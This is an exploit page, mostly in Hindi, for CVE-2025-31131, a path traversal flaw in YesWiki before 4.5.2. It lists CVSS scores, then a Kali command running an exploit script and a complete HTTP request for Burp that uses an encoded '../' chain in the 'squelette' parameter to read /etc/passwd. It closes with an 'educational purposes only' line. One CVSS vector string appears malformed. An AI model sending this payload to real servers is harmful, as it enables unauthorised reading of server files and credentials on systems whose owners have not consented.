
CVE-2025-31131
CVE-2025-31131 - YesWiki < 4.5.2 पाथ ट्रैवर्सल एक्सप्लॉइट
YesWiki PHP में लिखी गई एक विकी प्रणाली है। squelette पैरामीटर पाथ ट्रैवर्सल हमलों के प्रति संवेदनशील है, जो सर्वर पर मनमानी फ़ाइलों तक पढ़ने की पहुँच सक्षम बनाता है। यह भेद्यता 4.5.2 में ठीक कर दी गई है।
NIST: NVD बेस स्कोर: 7.5 🔴 उच्च वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CNA: GitHub, Inc बेस स्कोर: 8.6 🔴 उच्च वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C:C:H/I:N/A:N
┌──(kali㉿kali)-[~]
└─$ sudo python3 exploit.py -u https://example.com/
बर्प का उपयोग करके मैन्युअल रूप से एक्सप्लॉइट करने का दूसरा तरीका यहाँ है:
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
यह केवल शैक्षिक उद्देश्यों के लिए है।